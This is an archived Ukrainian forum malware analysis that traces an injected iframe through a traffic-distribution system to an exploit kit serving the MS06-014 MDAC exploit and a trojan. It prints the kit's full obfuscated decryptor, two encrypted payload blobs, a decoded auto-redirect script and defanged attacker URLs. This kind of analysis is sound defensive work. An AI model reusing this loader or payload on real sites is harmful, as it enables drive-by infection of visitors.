Перейти до змісту

Аналіз malware


CESAR

Рекомендовані повідомлення

Недавно прочитов тему та її обговорення,яка знаходиться тут....

І вирішив покопати в напрямку іфрейма на який наткнувся... rtls

Попереджую зразу якщо ви не знаєте з чим маєте справу краще не лізьте і ні в якому разі не переходьте по ссилкам! ;)

Для аналізу нам потрібна Malzilla malware hunting tool.Скачати її можна тут

Спочатку трошки теорії:

Сплойт-компютерна программа, фрагмент программного кода або послідовність команд, які використовують вразливості в программному забезпечені і приміняються для проведення атаки на пк.

Зв'язка сплойтів-це спеціальні скрипти (частіше всього на PHP) які обєднують декілька сплойтів.Використовувати зв'язки набагато більш еффективно чим використовувати окремі сплойти.

Зараз в основному використовуються так звані "інтелектуальні" зв'язки.

Зв'язки такого типу зазвичай працюють більш "гуманно". При заході людини на сайт зв'язка визначає версію його браузера, ОС і т.д. і після цього підгружає відповідний сплойт.

Як правило сплойти в зв'язках шифруются і їх розробники стараются зробити так щоб не можна було побачити сам код сплойтів.

Перше робиться для того щоб сплойт не спалили і не заблокировали антивіруси . Друге - для того щоб користувач не взнав що на сайті сплойт.

Стандарт з якого складається зв'язка: ротатор(визначає хорактеристики і видає під них сплойти), самі сплойти, адмін-панель\статистика.

TDS-це система розподілу трафа, вона отримує на себе весь траффік, і розподіляє його по країнам, запросам, повторним клікам, тобто по схемам які встановить вебмастер. Таким чином отримують повний контроль над траффіком, з одного центру.

І так почнемс......

Запускаєм малзіллу, в поле url вводим hххp://vpu6.lutsk.ua/index2.html натискаєм Get отримуєм:

040221db1.jpg

Ага як видно маємо іфрейм (та щей не криптований-палиться всім чим тільки можна-жах :D )на hххp://grizzli-counter.com/id120/index.php знову в малзіллу в поле url вбиваєм цей адрес нажимаєм Get,після чого нас кидає на TDS

hххp://tds-info.net/in.cgi?2 погоджуємось на редірект -нас кидає на зв'язку(точніше на її ротатор :) )hххp://grizzli-counter.com/id126/index.php також погоджуємось........і отримуєм якийсь бред....Нажимаєм на send script to decoder

040215ba152.jpg

Ну, напевно прийдеться його розшифрувати)Проаналізуєм даний код ...Бачим <script src="js/common.js" type="text/javascript"></script> підгружаєм його в малзіллі (hххp://grizzli-counter.com/id126/js/common.js)

Дивимся -ага common.js відповідає за дешифрування коду.........Ідем далі...Копіюєм код з common.js переходимо на вкладку decoder ,в малзіллі, вставляєм участок який відповідає за дешифровку.Отримуєм щось таке:


var WRITEAFEWWORDSCALLGIRL={encrypt:function(m,e,n){m=BASE64.encode(m);var asci=[],coded='';for(var i=0;i<m.length;i+=3){var tmpasci='1';for(var h=0;h<3;h++){if(i+h<m.length){tmpstr=this.ord(m.charAt(i+h))-30;if(tmpstr.length<2)tmpstr='0'+tmpstr;}else break;tmpasci+=tmpstr;}asci.push(tmpasci+'1')}for(var k=0;k<asci.length;k++){var resultmod=this.powmod(asci[k],e,n);var chunk=resultmod.toString(16);while(chunk.length<7)chunk='0'+chunk;coded+=chunk}coded=coded.replace(new RegExp('^+|+$','g'),'');return this.hexstr(coded)},onthedrydollarquarter:function(c,d,n){c=this.strhex©;var decryptarray=[],deencrypt='',resultd='';for(var i=0;i<c.length;i+=7)decryptarray.push(c.substr(i,7));for(var u=0;u<decryptarray.length;u++)if(decryptarray[u]=='')decryptarray.splice(u,1);for(var u=0;u<decryptarray.length;u++){var resultmod=this.powmod(parseInt(decryptarray[u],16),d,n)+'';deencrypt+=resultmod.substr(1,resultmod.length-2)}for(var u=0;u<deencrypt.length;u+=2)resultd+=this.chr(parseInt(deencrypt.substr(u,2),10)+30
);return BASE64.decode(resultd)},ord:function(chr){return ASCII.ord(chr)},chr:function(num){return ASCII.chr(num)},mod:function(g,l){return g-(l * Math.floor(g/l))},powmod:function(base,exp,modulus){var accum=1,i=0,basepow2=base;while((exp>>i)>0){if(((exp>>i)&1)==1)accum=this.mod((accum * basepow2),modulus);basepow2=this.mod((basepow2 * basepow2),modulus);i++}return accum},hexstr:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i+=2){var bte=parseInt(''+str.charAt(i)+str.charAt(i+1),16).toString(10);result+=ASCII.chr(bte)}retur
n result},strhex:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i++){var bte=ASCII.ord(str.charAt(i)).toString(16);result+=bte.length==2?bte:'0'+bte;}return result}};var ASCII={translations:{js2php:{1026:128,1027:129,8218:130,1107:131,8222:132,8230:1
33,8224:134,8225:135,8364:136,8240:137,1033:138,8249:139,1034:140,1036:141,1035:1
42,1039:143,1106:144,8216:145,8217:146,8220:147,8221:148,8226:149,8211:150,8212:1
51,65533:152,8482:153,1113:154,8250:155,1114:156,1116:157,1115:158,1119:159,1038:
161,1118:162,1032:163,1168:165,1025:168,1028:170,1031:175,1030:178,1110:179,1169:
180,1105:184,8470:185,1108:186,1112:188,1029:189,1109:190,1111:191,1040:192,1041:
193,1042:194,1043:195,1044:196,1045:197,1046:198,1047:199,1048:200,1049:201,1050:
202,1051:203,1052:204,1053:205,1054:206,1055:207,1056:208,1057:209,1058:210,1059:
211,1060:212,1061:213,1062:214,1063:215,1064:216,1065:217,1066:218,1067:219,1068:
220,1069:221,1070:222,1071:223,1072:224,1073:225,1074:226,1075:227,1076:228,1077:
229,1078:230,1079:231,1080:232,1081:233,1082:234,1083:235,1084:236,1085:237,1086:
238,1087:239,1088:240,1089:241,1090:242,1091:243,1092:244,1093:245,1094:246,1095:
247,1096:248,1097:249,1098:250,1099:251,1100:252,1101:253,1102:254,1103:255},php2
js:{128:1026,129:1027,130:8218,131:1107,132:8222,133:8230,134:8224,135:8225,136:8
364,137:8240,138:1033,139:8249,140:1034,141:1036,142:1035,143:1039,144:1106,145:8
216,146:8217,147:8220,148:8221,149:8226,150:8211,151:8212,152:65533,153:8482,154:
1113,155:8250,156:1114,157:1116,158:1115,159:1119,161:1038,162:1118,163:1032,165:
1168,168:1025,170:1028,175:1031,178:1030,179:1110,180:1169,184:1105,185:8470,186:
1108,188:1112,189:1029,190:1109,191:1111,192:1040,193:1041,194:1042,195:1043,196:
1044,197:1045,198:1046,199:1047,200:1048,201:1049,202:1050,203:1051,204:1052,205:
1053,206:1054,207:1055,208:1056,209:1057,210:1058,211:1059,212:1060,213:1061,214:
1062,215:1063,216:1064,217:1065,218:1066,219:1067,220:1068,221:1069,222:1070,223:
1071,224:1072,225:1073,226:1074,227:1075,228:1076,229:1077,230:1078,231:1079,232:
1080,233:1081,234:1082,235:1083,236:1084,237:1085,238:1086,239:1087,240:1088,241:
1089,242:1090,243:1091,244:1092,245:1093,246:1094,247:1095,248:1096,249:1097,250:
1098,251:1099,252:1100,253:1101,254:1102,255:1103}},ord:function(chr,dir){dir=dir
||'js2php';if(!this.translations[dir])return null;chr=chr.charCodeAt(0);return(chr in this.translations[dir])?this.translations[dir][chr]:chr},chr:function(ord,dir){dir=dir||'php2js';if(!this.translations[dir])return null;ord=(ord in this.translations[dir])?this.translations[dir][ord]:ord;return String.fromCharCode(ord)}};var BASE64={alphabet:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;while(i<input.length){chr1=ASCII.ord(input.charAt(i++));chr2=ASCII.ord(input.charAt(i
++));chr3=ASCII.ord(input.charAt(i++));enc1=chr1>>2;enc2=((chr1&3)<<4)|(chr2>>4);enc3=((chr2&15)<<2)|(chr3>>6);enc4=chr3&63;if(isNaN(chr2))enc3=enc4=64;else if(isNaN(chr3))enc4=64;output=output+this.alphabet.charAt(enc1)+this.alphabet.ch
arAt(enc2)+this.alphabet.charAt(enc3)+this.alphabet.charAt(enc4)}return output},decode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;input=input.replace(new RegExp('[^A-Za-z0-9+/=]','g'),'');while(i<input.length){enc1=this.alphabet.indexOf(input.charAt(i++));enc2=this.alphabe
t.indexOf(input.charAt(i++));enc3=this.alphabet.indexOf(input.charAt(i++));enc4=t
his.alphabet.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2 & 15)<<4)|(enc3>>2);chr3=((enc3 & 3)<<6)|enc4;output=output+ASCII.chr(chr1);if(enc3!=64)output=output+ASCII.chr(chr2);if(enc4!=64)output=output+ASCII.chr(chr3)}
return output}}

document.write(WRITEAFEWWORDSCALLGIRL.onthedrydollarquarter('1073aed20140bc119ac311521c881c8807e0ec1aae0ee224a03270d11d815b323f1d911bc6dd
b1fdd3e60b975b409a3223253261e034bffc1fe1c980f25d401a6fd650368b1f0f38264226c8371fb
ffc5042a4191797fc6217a7770b3c7d40e69bd417156ae09100e614a4a361b195bd1e2d38d0038ce8
1c2be910b40bd91d316650cc67d716698090e7783f1d9a1570f5afc50a3dd070d8e9501c451101cf4
12221c683100f2a1007011af1db5ecc17075c81b195bd1862fa804c41fc241cb8a1d99b81090e2e10
8822ea181aa6f1398c0020806ef0b56e8a0f83b3b0f4bf93025483713422d30f8901805b15370422d
10038eeb403a54d41756f8a0226e391c81be6067f12502159fc1c51f0f1689b840f2f236171413523
f305d1568d6d08da3d7233062a085ac0700175960f32177100ff5a0296f021586bb1004f4a60acf99
90963e001c9cb0e072aa11175f13100b96d00211b6b231b8d612cbd54094f9bf16aa8920ba3c9d21f
80f50d19cd90c3907b08da3d7233062a085ac0700175961b6862a02361a71bb33771d7464b17f7360
07f6ace157edef1ab24a919ba472091a5b7065acdf01c82e9067f1251d7ed0d119b5a500e4e800e21
099206019b1e6d3d712327c80f8b4d417f12c70b8200518e19980a9c19f19f5a920efe6a6209f62f1
b6862a0af82661a7b4bd21323a014ed634165a01c163772f1c2cf3117728c915c2c721a7b4bd04081
2c0b8b26720522581a60c250932ab410b442c0f72723155f8d50b9edd02419e2f214a71702dc5b61b
758ce0b08cce00b56d9033442621a90f30e020c10dd039b004d5e408aa38a12fdf4108cf83322abaf
60101be50a138e10505bd40ac448a0abc7f218bdbd31f2774b00d99bf08a8c65049958c221280707f
7b60192f38901eacd50dbf068055f1b823f6abf067a877','21689417','39042433'));

Далі натискаєм на run script і вуаля бачимо знизу розшифрований код,но це ще далеко не кінець ^_^


<script>
function randomNumber(m,n)
{
m=parseInt(m);
n=parseInt(n);
return Math.floor(Math.random()*(n-m+1))+m;
}
</script>
<script>
function ieopen(url)
{
var fakeLink = document.createElement("a");
fakeLink.href = url;
document.body.appendChild(fakeLink);
fakeLink.click();
}
</script><body onload=setTimeout(onmousemove="ieopen('http://grizzli-counter.com/id126/mdac.php')",randomNumber(100,200))></body>

Як видно нас знову кудись посилають :huh: (onmousemove="ieopen('hххp://grizzli-counter.com/id126/mdac.php'))

Вбиваєм в малзіллу (hххp://grizzli-counter.com/id126/mdac.php) знову get і знову якийсь набір символів(но вже більший по об'єму) який підгружає все той же src="js/common.js")Далі копіюєм цей бред (без тегів починаючи з document.write) переходим на вкладку decoder видаляєм попередній шифрокод (замість нього вставляємо новий шифрокод)і отримуєм щось на зразок цього:


var WRITEAFEWWORDSCALLGIRL={encrypt:function(m,e,n){m=BASE64.encode(m);var asci=[],coded='';for(var i=0;i<m.length;i+=3){var tmpasci='1';for(var h=0;h<3;h++){if(i+h<m.length){tmpstr=this.ord(m.charAt(i+h))-30;if(tmpstr.length<2)tmpstr='0'+tmpstr;}else break;tmpasci+=tmpstr;}asci.push(tmpasci+'1')}for(var k=0;k<asci.length;k++){var resultmod=this.powmod(asci[k],e,n);var chunk=resultmod.toString(16);while(chunk.length<7)chunk='0'+chunk;coded+=chunk}coded=coded.replace(new RegExp('^+|+$','g'),'');return this.hexstr(coded)},onthedrydollarquarter:function(c,d,n){c=this.strhex©;var decryptarray=[],deencrypt='',resultd='';for(var i=0;i<c.length;i+=7)decryptarray.push(c.substr(i,7));for(var u=0;u<decryptarray.length;u++)if(decryptarray[u]=='')decryptarray.splice(u,1);for(var u=0;u<decryptarray.length;u++){var resultmod=this.powmod(parseInt(decryptarray[u],16),d,n)+'';deencrypt+=resultmod.substr(1,resultmod.length-2)}for(var u=0;u<deencrypt.length;u+=2)resultd+=this.chr(parseInt(deencrypt.substr(u,2),10)+30
);return BASE64.decode(resultd)},ord:function(chr){return ASCII.ord(chr)},chr:function(num){return ASCII.chr(num)},mod:function(g,l){return g-(l * Math.floor(g/l))},powmod:function(base,exp,modulus){var accum=1,i=0,basepow2=base;while((exp>>i)>0){if(((exp>>i)&1)==1)accum=this.mod((accum * basepow2),modulus);basepow2=this.mod((basepow2 * basepow2),modulus);i++}return accum},hexstr:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i+=2){var bte=parseInt(''+str.charAt(i)+str.charAt(i+1),16).toString(10);result+=ASCII.chr(bte)}retur
n result},strhex:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i++){var bte=ASCII.ord(str.charAt(i)).toString(16);result+=bte.length==2?bte:'0'+bte;}return result}};var ASCII={translations:{js2php:{1026:128,1027:129,8218:130,1107:131,8222:132,8230:1
33,8224:134,8225:135,8364:136,8240:137,1033:138,8249:139,1034:140,1036:141,1035:1
42,1039:143,1106:144,8216:145,8217:146,8220:147,8221:148,8226:149,8211:150,8212:1
51,65533:152,8482:153,1113:154,8250:155,1114:156,1116:157,1115:158,1119:159,1038:
161,1118:162,1032:163,1168:165,1025:168,1028:170,1031:175,1030:178,1110:179,1169:
180,1105:184,8470:185,1108:186,1112:188,1029:189,1109:190,1111:191,1040:192,1041:
193,1042:194,1043:195,1044:196,1045:197,1046:198,1047:199,1048:200,1049:201,1050:
202,1051:203,1052:204,1053:205,1054:206,1055:207,1056:208,1057:209,1058:210,1059:
211,1060:212,1061:213,1062:214,1063:215,1064:216,1065:217,1066:218,1067:219,1068:
220,1069:221,1070:222,1071:223,1072:224,1073:225,1074:226,1075:227,1076:228,1077:
229,1078:230,1079:231,1080:232,1081:233,1082:234,1083:235,1084:236,1085:237,1086:
238,1087:239,1088:240,1089:241,1090:242,1091:243,1092:244,1093:245,1094:246,1095:
247,1096:248,1097:249,1098:250,1099:251,1100:252,1101:253,1102:254,1103:255},php2
js:{128:1026,129:1027,130:8218,131:1107,132:8222,133:8230,134:8224,135:8225,136:8
364,137:8240,138:1033,139:8249,140:1034,141:1036,142:1035,143:1039,144:1106,145:8
216,146:8217,147:8220,148:8221,149:8226,150:8211,151:8212,152:65533,153:8482,154:
1113,155:8250,156:1114,157:1116,158:1115,159:1119,161:1038,162:1118,163:1032,165:
1168,168:1025,170:1028,175:1031,178:1030,179:1110,180:1169,184:1105,185:8470,186:
1108,188:1112,189:1029,190:1109,191:1111,192:1040,193:1041,194:1042,195:1043,196:
1044,197:1045,198:1046,199:1047,200:1048,201:1049,202:1050,203:1051,204:1052,205:
1053,206:1054,207:1055,208:1056,209:1057,210:1058,211:1059,212:1060,213:1061,214:
1062,215:1063,216:1064,217:1065,218:1066,219:1067,220:1068,221:1069,222:1070,223:
1071,224:1072,225:1073,226:1074,227:1075,228:1076,229:1077,230:1078,231:1079,232:
1080,233:1081,234:1082,235:1083,236:1084,237:1085,238:1086,239:1087,240:1088,241:
1089,242:1090,243:1091,244:1092,245:1093,246:1094,247:1095,248:1096,249:1097,250:
1098,251:1099,252:1100,253:1101,254:1102,255:1103}},ord:function(chr,dir){dir=dir
||'js2php';if(!this.translations[dir])return null;chr=chr.charCodeAt(0);return(chr in this.translations[dir])?this.translations[dir][chr]:chr},chr:function(ord,dir){dir=dir||'php2js';if(!this.translations[dir])return null;ord=(ord in this.translations[dir])?this.translations[dir][ord]:ord;return String.fromCharCode(ord)}};var BASE64={alphabet:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;while(i<input.length){chr1=ASCII.ord(input.charAt(i++));chr2=ASCII.ord(input.charAt(i
++));chr3=ASCII.ord(input.charAt(i++));enc1=chr1>>2;enc2=((chr1&3)<<4)|(chr2>>4);enc3=((chr2&15)<<2)|(chr3>>6);enc4=chr3&63;if(isNaN(chr2))enc3=enc4=64;else if(isNaN(chr3))enc4=64;output=output+this.alphabet.charAt(enc1)+this.alphabet.ch
arAt(enc2)+this.alphabet.charAt(enc3)+this.alphabet.charAt(enc4)}return output},decode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;input=input.replace(new RegExp('[^A-Za-z0-9+/=]','g'),'');while(i<input.length){enc1=this.alphabet.indexOf(input.charAt(i++));enc2=this.alphabe
t.indexOf(input.charAt(i++));enc3=this.alphabet.indexOf(input.charAt(i++));enc4=t
his.alphabet.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2 & 15)<<4)|(enc3>>2);chr3=((enc3 & 3)<<6)|enc4;output=output+ASCII.chr(chr1);if(enc3!=64)output=output+ASCII.chr(chr2);if(enc4!=64)output=output+ASCII.chr(chr3)}
return output}}

document.write(WRITEAFEWWORDSCALLGIRL.onthedrydollarquarter('2511f2f1dcb05c29bde750f84acc0c649401805c1005d06572ca2e451b097c11137d87050429
e0e592892067c1519d61b01e0eba811a6f911184d0114720921fbd80b1cda07f0e80c35250e74023b
4b3e047f541060796f186994300c4cd026c1f5f13d033e273b32f01e6592022473e05f7d7d019a19c
1a47eac0ff7c2727ed95f248f501069526102cb49229e8ad504b637a1c27b3012cc9900d6960a0eed
62d0b2a56218e9457290afa001ba2f32cbceca0bba81022a5dcb035cf8700fee0d20eb6c614c86401
9ba49603b141e2a4f3cf17ddca51bb8e56183d94e0fb540318af9ff214da8f2581c13088affe24d33
e61c858df269ecf606cec8617af2bc00dbc9c2c3b5c50cb9d05004845a2b217c61c11ee526c06ee0a
4987f1269e6808865b12499cd625de9be0800775280f91b1a58271148e7c122d4976140061c1af084
21293d53125e3fb28df39b2c6e7ab15ef35b1269e68213830e20eb6c61cfbe34131828c1c397ba06a
d7f1053798112cec1a28dd3d6060cb9b14a4fdf1297cf02b3ca580b573a7017247a1f8983007de671
06a394812a06d405fd427165f6ed1ad8fc8227270e2b217c61c11ee526c06ee0a4987f1269e680886
5b12499cd625de9be2d1363929126510b86b4e0ab5ab32539a170af5b130b8e5e212a06d405fd4271
65f6ed1ad8fc8227270e2b217c61c11ee526c06ee0a4987f1269e6808865b12499cd625de9be2d136
3929126510b86b4e0ab5ab3280af3726d5b3606a394812a06d405fd427165f6ed1ad8fc8227270e2b
217c61c11ee526c06ee0a4987f1269e6808865b12499cd625de9be2d1363929126510b86b4e0ab5ab
3280af37096c78316008dc241b69810c288519529051d192ae2067c1507113242880aff0c086b322a
f0b4169951e11bb2b412cc9900d6960a0eed62d0b2a56218e9457019e39e081afe510ca50715218dc
1e8a29f019a2ce146b19111d64fa174329b2782f6f10698292087ea22b546ec067b8a918e7467294d
60e1c19aa81664f3611dfa720c65b30241589f18c675e2a93f911182ca307f48e7108711116d29970
52fade0172d2f0d05e6e2a93f910eef0f62acd90f1379efa0a4075620eb6c614c86401af70f52bb3d
cf05d36152cc31980091128269ecf60ceaf4d09f62a310871112760bf42d269521e8a29f019a2ce14
6b19127fc3d32222a032794d271d34fec12f196206b932a0fab8061e0eba811a6f912787e99034c21
c122dbc81c8889a1147e611c7697019c005b27593352bb146b1d51c1a2539a1716bd74a14cb557263
cd442ccff04060cb9b14a4fdf0ac5762107bfa70bf3c750840eb413844a327124461b4dd3f0f3419f
05fd427181a37f1940b66021b81209da4da00b60d7014f1b62222a032794d271d34fec12f196206b9
32a023a97f2c5a4c025366b41b9c4312794d272be94c01ef81212067c15204028302a4a1d222b1b32
3e33f5286ff1c2a7f43a20eb6c600e5d2816a4bfd13c956427fc3d32a9aaac26702872187bb301601
3310f76801133e722cd2b241b2876517496c21c1bc9d255bb2f1af46281860bb91b2001616f4c9a15
34df02bf62d41d87e521b2a18e20eb6c604960de26435ef13d64f20c3bd312067c152431a72106080
b0c3277e2222a032794d271d34fec12f196206b932a1c148ad1fa0c1a070c4c7162982727b89a916f
5c7b0f5eea2267a3ed0e8cee71db09382ce1e690cfa4e62aac659104107c1b2df000af6307102c51b
17f247e2c4cdd814cdd6922e15e0287c2be09007c414a4fdf1a1b68c19288d705cc2520e05ab91107
26c1fdfd29060cb9b14a4fdf0ac5762107bfa727cf5b52148e0b0ecf4f30fc7cad0faa68019775db2
bec853234aa720c3277e024e87b286490804b47b4159499b0c63bea2bdaf0801e65920180f2f10892
2d207213c025345b12cc990073302005fd427165f6ed1ad8fc81dff53d03748791db093809213f227
ed95f05fd42713520591af169d0a0df0e289300a09d3f032d8fe9d052b88129f59af107288621f430
803d8b5b15a205d18228f32d4e7f90f2cd34060dca904262dc09d6df61d343cb05412cf1f73b2f284
71050e9e2c1231738b00a1efd20eb6c62c54bb315f64831e8758f147be6a175b2f705c24c71e8b640
06527af15f212507f9df016088692087ea20616b401ea6b4c1bc1a010152b5d1e4b6cf21402ec09c9
af227cd1db16f02130aae80624c4c7011d64fa2a6c3a41ad0f94013eef30479420015319c13e0e9a2
8df39b2c6e7ab15ef35b1269e681cec0a0077c1e322dcd9a02122d91e7375f044b6f91e8a29f115f3
60121931800369920cd80541bb8e5605007f61de4f28006660406430c11061da109609f1021b81209
da4da199676a21407ae24d576e05e47751e33cf7050cf5128ab1301214e830caa52f02f476f1dfb4d
a28649080b2a1250f38e371e8a29f115f3601899dd21a58271288b2e01099cec0caa52f02f476f0f1
68490fac4ca0b1b7530382f9005fe87f26bb7f9286b1370d388f714cbfde04b637a26ef56923eca13
0f168491c63f6b038dc3924731ee2775c231137d870a3e5f525f3dbd250b4b904b637a26ef56909a0
b50214f6b805956930231dc5208b75027c45080ab9314145527920f77dd05df1f416dae3c0dce7ad1
3568922cb991c2b9039908fe3cf22294730d43d55258539114597c41741ea40066604139a90612ab6
5909427dc14e971009da4da00b60d7254cd830d5838004b637a1a6f40e051c41c2a86e95276b3ee0c
5fee818a30f1067b1560b405560eb511b1cea9ca2067c151e736a305b25040d7f2ea292b1e90ed467
b04643e606f3bb920dedb029b644a0d4909c1df54fa1e2949c106f47824c60682a234af1e01597246
a366180b8ca20eb6c60f4c822102441e248508624e98121ed4d2e1d54fa9241fa4811158aa2865818
28125562ab60c7297f692057e5e12d18beb15c9e871e19cea11a285500bad000be73371ca079a0113
73e132200906e87a802af9732428d0528b05002442cec0c64ff90dcf32b0a44cfe0cb529e1a681732
51e3fa0b4438c1f5267719cb2e12067c15223498810f7ce10fc254c1e177c8122330210f7ce124b7a
d918288c017961a208d0999250a01c1e2949c041b35e10f7ce1250a01c18288c01499fe3180b8ca20
eb6c60185675041b35e2ad9ab71df54fa1e2949c041b35e09edb96250a01c19d2f880858e5f1c0cfb
f297f69218288c0041b35e10f7ce1223c59c143d60e00bad000be73372d430960dcf32b012fb342d0
10430ee0c471aa16012cda7b5207cbfa09c9f31033c10d0f4e96d04b9301276bdca0d9cf56184182b
104b91911ca2ae2067c152234988257d7c7237abc603f259e05c8f8e251234f1f7a22b17057d00c01
fba03b19c90493a0613b70051071a6f0736d4c29b318a0adc62e2a6879b180b8ca20eb6c6213b6ef0
902eb109514c1130b13625365d626964a821b0b8f2449f9a1c92ee3054177e149942d0cdf6501e015
97112df5d082da761e19cea201fdf300bad000be733703ef1e526af2b40c4fea12d72149089dc920f
d283d28b050019c72b00b1a9f60af36cf1c417fb1e1eb1a20cdb6e2c0376f0c479312735f5619cb2e
12067c1522349880e61e072c9cd69143ae8e2ce37b201383f0243e3170c49de30293b422c277eb00c
2b590c1340f1b9660d1d2758b0358d6912bdbe92383bc4180b8ca20eb6c60f4c82205856332568125
2d33c171b8e0242cd8f710e33824251a2581e5f18a22557ad1237aef2b7498e0061ffc1c0941a0fa9
ca21f935fc23c51cf00bad000be73371b169fa057e5e12348dbb0efa8ad1364db019b3a2b28b05000
1d29cd020666a01198ed0cace64087c0ba064d0c020dedb00fbad3b0bd16092257d682067c151e736
a324b4ff20fbe5d3050430c184b16120d83040be1be41a35fcb147100112d21b124f9dd113f3e0a08
58e5f0c2c73c1443dd616d27f5231043308f805c2a4f3cf0304ffe04b637a1a6f40e212144e05fe87
f20f3fae16ef04a1b287651c39c611888d892539a1702e797411139ef204028302a4a1d2371e700f0
b0eb24144380caa52f0543e6926d5b661bfa95f1d2d81610f28b71fce04d239d25722a907a193689b
1b097c11094322133798d14ccdff1a754ce0c6841b2103efc0f38e3711139ef10614fb1f6de190541
031104107c155405a154278200f30f617ff3190deedb4188e2862d69bdf118040c110bdff286237c2
01a0a32c8611d276b3ee0c5fee81b2981b01a6ddc04b637a1dcf4b925808f80dd0fb3035cf871dcf4
b902e797411139ef1898c5908865b112cc9902cac2e22562ff12539a170ca8b972484b4d2d0e55803
022d3016e37e272442428c3cdf1927dd31c1c4502bd39231af654b09d299909adc9102fae8300dbc9
c0b2a562252406a2c829c71bb8e562a2cac923c255a27e9a5b24a4b082539a170ca8b971fc8fab1bb
8e562a2cac90ca8b97019e39e081afe51b2a18e20eb6c62cac2e22982f0c2539a170ca8b9712a06d4
05fd427165f6ed1ad8fc81b6bb461bb8e560ae975712cc99001648122a39003109f65820eb6c60153
19c09da4da1cec0a0077c1e322dcd9a12ed40211bb2b412cc9900d6960a0eed62d0b2a56218e94570
7bcd2c274391405d063b00f30f60ce79ae1660b321b9c4731b287652a761371094322058db4e0b469
470930dc800dbc9c0b2a5621c08f2f0adb80813fbad42c43c6f193ec6c104107c1878cf222fcd1125
7646807d8fd6239bf0c1b6478e242b4fd1f343de2cd54c5032045a0156a731ae721e1b4a4df09c9af
228471051bfb0f809aa73a206614410344f429250dc24fd5bd0ce42d2080581603c672904b637a060
9bd52053dea08e8777239d25714dd6a50eac0142bada662da1b0f02a3f6f19695212d02a7d234812c
15420c52c6f829052b88126f5e9119a28d0048ce0b20c699101bbdbc1bf84bc237473211d0dee2498
d5d1fa0c1a070c4c7162982718ea57d254725525105662517b971bf43e3032045a298c04515464c40
71687f10a8535163695a08e8777239d25714dd6a50eac0140a852982b9c0df01252c417fa647','39480655','48118949'));

Жмем run script і знизу отримуєм розшифрований код...........

0402db74.jpg

Напевно цікаво що це таке??Це експлойт Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) який підгружає вам ехе файл (троян),він спрацьовує лише на версіях ie 5,6....

Як видно з коду при спрацюванні даного експлойта на пк завантажується троянська программа по ссилці яка знаходиться в змінній eurl (var eurl = 'hххp://grizzli-counter.com/id126/newload.php?ids=MDAC';)Де параметр який передається через гет(ids=MDAC)потрібен для статистики......

Прогружає дана звязка сплойтів трояна.....Ось що про нього сказав вірустотал.......

hххp://www.virustotal.com/ru/analisis/f9e897fe1576109176ef0414f0ac8ed9edfbffc0540452f8c02ea03a4e65f3c5-1265235616

Результат: 18/39 (46.15%)

Як видно троян палиться 18 з 39 антивірусів.

Також таким самим чином були зняті інші сплойти(Java сплойт,PDF сплойти,Flash сплойт...)

PS Якщо виникнуть якісь запитання -завжди буду радий відповісти на питання....

(с) cEsAr

Посилання на коментар
Поділитись на інші сайти

Попереджую зразу якщо ви не знаєте з чим маєте справу краще не лізьте і ні в якому разі не переходьте по ссилкам!

...

PS Якщо виникнуть якісь запитання -завжди буду радий відповісти на питання....

а от якщо не знаєш з чим маєш справу і не лізеш - питань не виникає...

ПС: притримався поради - не ліз:_)

Посилання на коментар
Поділитись на інші сайти

Питання виникають завжди=/Можна просто почитати-зробити свій висновок ну і якщо щось не зрозуміло-задати питання)

Посилання на коментар
Поділитись на інші сайти

Заархівовано

Ця тема знаходиться в архіві та закрита для подальших відповідей.


Hosting Ukraine
AliExpress WW


×
×
  • Створити...